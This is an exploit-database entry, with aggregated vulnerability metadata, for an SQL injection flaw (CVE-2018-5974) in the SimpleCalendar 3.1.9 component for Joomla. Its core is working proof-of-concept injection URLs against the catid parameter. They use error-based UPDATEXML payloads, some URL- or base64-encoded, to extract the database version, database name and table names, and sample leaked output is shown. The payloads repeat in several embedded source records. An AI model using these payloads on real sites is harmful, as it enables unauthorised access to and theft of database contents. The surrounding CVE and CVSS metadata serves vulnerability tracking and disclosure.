ID 1337DAY-ID-29834
Type zdt
Reporter Ihsan Sencan
Modified 2018-02-17T00:00:00
Description
Exploit for php platform in category web applications
# # # #
# Exploit Title: Joomla! Component SimpleCalendar 3.1.9 - SQL Injection
# Vendor Homepage: http://albonico.ch/
# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html
# Version: 3.1.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5974
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL]
#
# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTMwJTJjJTJmJTJhJTIxJTMwJTMxJTMxJTMxJTMxJTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4MHgyZSUyYyU3NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyOCUyOSUyYzB4N2U3ZTdlN2UlMmMlMjglNTMlNDUlNGMlNDUlNDMlNTQlMjAlMjglNDUlNGMlNTQlMjglMzYlMzYlM2QlMzYlMzYlMmMlMzElMjklMjklMjklMmMlNjQlNjElNzQlNjElNjIlNjElNzMlNjUlMjglMjklMjklMmMyOTI1JTI5JTI5
#
# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL]
#
# KC8qITAyMjI1VVBEQVRFWE1MKi8oNjYsQ09OQ0FUKDB4M2EsKC8qITAyMjI1U0VMRUNUKi8rR1JPVVBfQ09OQ0FUKHRhYmxlX25hbWUrU0VQQVJBVE9SKzB4M2EpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUysvKiEwMjIyNVdIRVJFKi8rVEFCTEVfU0NIRU1BPURBVEFCQVNFKCkpLChFTFQoMT0xLDEpKSksMSkp
#
# # # #
http://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1))
http://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=%28%55%50%44%41%54%45%58%4d%4c%28%30%2c%2f%2a%21%30%31%31%31%31%43%4f%4e%43%41%54%2a%2f%280x2e%2c%76%65%72%73%69%6f%6e%28%29%2c0x7e7e7e7e%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%2c2925%29%29
XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375'
# 0day.today [2018-04-08] #
{"href": "https://0day.today/exploit/description/29834", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component SimpleCalendar 3.1.9 - SQL Injection\r\n# Vendor Homepage: http://albonico.ch/\r\n# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html\r\n# Version: 3.1.9\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-5974\r\n# # # #\r\n# Exploit Author: Ihsan Sencan \r\n# # # # \r\n# \r\n# POC:\r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL]\r\n# \r\n# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTMwJTJjJTJmJTJhJTIxJTMwJTMxJTMxJTMxJTMxJTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4MHgyZSUyYyU3NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyOCUyOSUyYzB4N2U3ZTdlN2UlMmMlMjglNTMlNDUlNGMlNDUlNDMlNTQlMjAlMjglNDUlNGMlNTQlMjglMzYlMzYlM2QlMzYlMzYlMmMlMzElMjklMjklMjklMmMlNjQlNjElNzQlNjElNjIlNjElNzMlNjUlMjglMjklMjklMmMyOTI1JTI5JTI5\r\n# \r\n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL]\r\n# \r\n# KC8qITAyMjI1VVBEQVRFWE1MKi8oNjYsQ09OQ0FUKDB4M2EsKC8qITAyMjI1U0VMRUNUKi8rR1JPVVBfQ09OQ0FUKHRhYmxlX25hbWUrU0VQQVJBVE9SKzB4M2EpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUysvKiEwMjIyNVdIRVJFKi8rVEFCTEVfU0NIRU1BPURBVEFCQVNFKCkpLChFTFQoMT0xLDEpKSksMSkp\r\n# \r\n# # # #\r\n \r\nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1))\r\n \r\nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=%28%55%50%44%41%54%45%58%4d%4c%28%30%2c%2f%2a%21%30%31%31%31%31%43%4f%4e%43%41%54%2a%2f%280x2e%2c%76%65%72%73%69%6f%6e%28%29%2c0x7e7e7e7e%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%2c2925%29%29\r\n XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375'\n\n# 0day.today [2018-04-08] #", "bulletinFamily": "exploit", "modified": "2018-02-17T00:00:00", "title": "Joomla SimpleCalendar 3.1.9 Component - SQL Injection Vulnerability", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "sourceHref": "https://0day.today/exploit/29834", "cvelist": ["CVE-2018-5974"], "description": "Exploit for php platform in category web applications", "viewCount": 9, "published": "2018-02-17T00:00:00", "edition": 1, "id": "1337DAY-ID-29834", "type": "zdt", "lastseen": "2018-04-08T07:42:58", "reporter": "Ihsan Sencan", "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2018-04-08T07:42:58", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-5974"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C2C11B3F6A010145A4DF75B80E802E75"]}, {"type": "joomla", "idList": ["JVEL:594"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146456"]}, {"type": "exploitdb", "idList": ["EDB-ID:44126"]}], "modified": "2018-04-08T07:42:58", "rev": 2}, "vulnersScore": 6.5}, "references": []}
{"cve": [{"lastseen": "2021-02-02T06:52:40", "description": "SQL Injection exists in the SimpleCalendar 3.1.9 component for Joomla! via the catid array parameter.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-17T07:29:00", "title": "CVE-2018-5974", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5974"], "modified": "2018-03-02T15:52:00", "cpe": ["cpe:/a:albonico:simplecalendar:3.1.9"], "id": "CVE-2018-5974", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5974", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:albonico:simplecalendar:3.1.9:*:*:*:*:joomla\\!:*:*"]}], "packetstorm": [{"lastseen": "2018-02-17T17:02:52", "description": "", "published": "2018-02-17T00:00:00", "type": "packetstorm", "title": "Joomla! SimpleCalendar 3.1.9 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-5974"], "modified": "2018-02-17T00:00:00", "id": "PACKETSTORM:146456", "href": "https://packetstormsecurity.com/files/146456/Joomla-SimpleCalendar-3.1.9-SQL-Injection.html", "sourceData": "`# # # # \n# Exploit Title: Joomla! Component SimpleCalendar 3.1.9 - SQL Injection \n# Dork: N/A \n# Date: 16.02.2018 \n# Vendor Homepage: http://albonico.ch/ \n# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html \n# Version: 3.1.9 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-5974 \n# # # # \n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC: \n# \n# 1) \n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL] \n# \n# \n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL] \n# \n# \n# # # # \n \nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1)) \n \nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=%28%55%50%44%41%54%45%58%4d%4c%28%30%2c%2f%2a%21%30%31%31%31%31%43%4f%4e%43%41%54%2a%2f%280x2e%2c%76%65%72%73%69%6f%6e%28%29%2c0x7e7e7e7e%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%2c2925%29%29 \nXPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/146456/joomlasimplecalendar319-sql.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:23", "description": "\nJoomla! Component SimpleCalendar 3.1.9 - SQL Injection", "edition": 1, "published": "2018-02-16T00:00:00", "title": "Joomla! Component SimpleCalendar 3.1.9 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-5974"], "modified": "2018-02-16T00:00:00", "id": "EXPLOITPACK:C2C11B3F6A010145A4DF75B80E802E75", "href": "", "sourceData": "# # # #\n# Exploit Title: Joomla! Component SimpleCalendar 3.1.9 - SQL Injection\n# Dork: N/A\n# Date: 16.02.2018\n# Vendor Homepage: http://albonico.ch/\n# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html\n# Version: 3.1.9\n# Category: Webapps\n# Tested on: WiN7_x64/KaLiLinuX_x64\n# CVE: CVE-2018-5974\n# # # #\n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC:\n# \n# 1)\n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL]\n# \n# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTMwJTJjJTJmJTJhJTIxJTMwJTMxJTMxJTMxJTMxJTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4MHgyZSUyYyU3NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyOCUyOSUyYzB4N2U3ZTdlN2UlMmMlMjglNTMlNDUlNGMlNDUlNDMlNTQlMjAlMjglNDUlNGMlNTQlMjglMzYlMzYlM2QlMzYlMzYlMmMlMzElMjklMjklMjklMmMlNjQlNjElNzQlNjElNjIlNjElNzMlNjUlMjglMjklMjklMmMyOTI1JTI5JTI5\n# \n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL]\n# \n# KC8qITAyMjI1VVBEQVRFWE1MKi8oNjYsQ09OQ0FUKDB4M2EsKC8qITAyMjI1U0VMRUNUKi8rR1JPVVBfQ09OQ0FUKHRhYmxlX25hbWUrU0VQQVJBVE9SKzB4M2EpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUysvKiEwMjIyNVdIRVJFKi8rVEFCTEVfU0NIRU1BPURBVEFCQVNFKCkpLChFTFQoMT0xLDEpKSksMSkp\n# \n# # # #\n\nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1))\n\nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=%28%55%50%44%41%54%45%58%4d%4c%28%30%2c%2f%2a%21%30%31%31%31%31%43%4f%4e%43%41%54%2a%2f%280x2e%2c%76%65%72%73%69%6f%6e%28%29%2c0x7e7e7e7e%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%2c2925%29%29\n XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375'", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-02-16T23:02:44", "description": "Joomla! Component SimpleCalendar 3.1.9 - SQL Injection. CVE-2018-5974. Webapps exploit for PHP platform. Tags: SQL Injection (SQLi)", "published": "2018-02-16T00:00:00", "type": "exploitdb", "title": "Joomla! Component SimpleCalendar 3.1.9 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-5974"], "modified": "2018-02-16T00:00:00", "id": "EDB-ID:44126", "href": "https://www.exploit-db.com/exploits/44126/", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component SimpleCalendar 3.1.9 - SQL Injection\r\n# Dork: N/A\r\n# Date: 16.02.2018\r\n# Vendor Homepage: http://albonico.ch/\r\n# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html\r\n# Version: 3.1.9\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-5974\r\n# # # #\r\n# Exploit Author: Ihsan Sencan \r\n# # # # \r\n# \r\n# POC:\r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL]\r\n# \r\n# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTMwJTJjJTJmJTJhJTIxJTMwJTMxJTMxJTMxJTMxJTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4MHgyZSUyYyU3NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyOCUyOSUyYzB4N2U3ZTdlN2UlMmMlMjglNTMlNDUlNGMlNDUlNDMlNTQlMjAlMjglNDUlNGMlNTQlMjglMzYlMzYlM2QlMzYlMzYlMmMlMzElMjklMjklMjklMmMlNjQlNjElNzQlNjElNjIlNjElNzMlNjUlMjglMjklMjklMmMyOTI1JTI5JTI5\r\n# \r\n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL]\r\n# \r\n# KC8qITAyMjI1VVBEQVRFWE1MKi8oNjYsQ09OQ0FUKDB4M2EsKC8qITAyMjI1U0VMRUNUKi8rR1JPVVBfQ09OQ0FUKHRhYmxlX25hbWUrU0VQQVJBVE9SKzB4M2EpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUysvKiEwMjIyNVdIRVJFKi8rVEFCTEVfU0NIRU1BPURBVEFCQVNFKCkpLChFTFQoMT0xLDEpKSksMSkp\r\n# \r\n# # # #\r\n\r\nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1))\r\n\r\nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=%28%55%50%44%41%54%45%58%4d%4c%28%30%2c%2f%2a%21%30%31%31%31%31%43%4f%4e%43%41%54%2a%2f%280x2e%2c%76%65%72%73%69%6f%6e%28%29%2c0x7e7e7e7e%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%2c2925%29%29\r\n XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375'", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44126/"}], "joomla": [{"lastseen": "2020-11-13T19:49:16", "bulletinFamily": "software", "cvelist": ["CVE-2018-5974"], "description": "Simple Calendar by Fabrizio Albonico, versions 3.1.9 and previous, SQL Injection\n", "modified": "2020-03-20T19:51:03", "published": "2018-03-07T00:00:00", "id": "JVEL:594", "href": "https://vel.joomla.org", "type": "joomla", "title": "Simple Calendar,3.1.9,SQL Injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
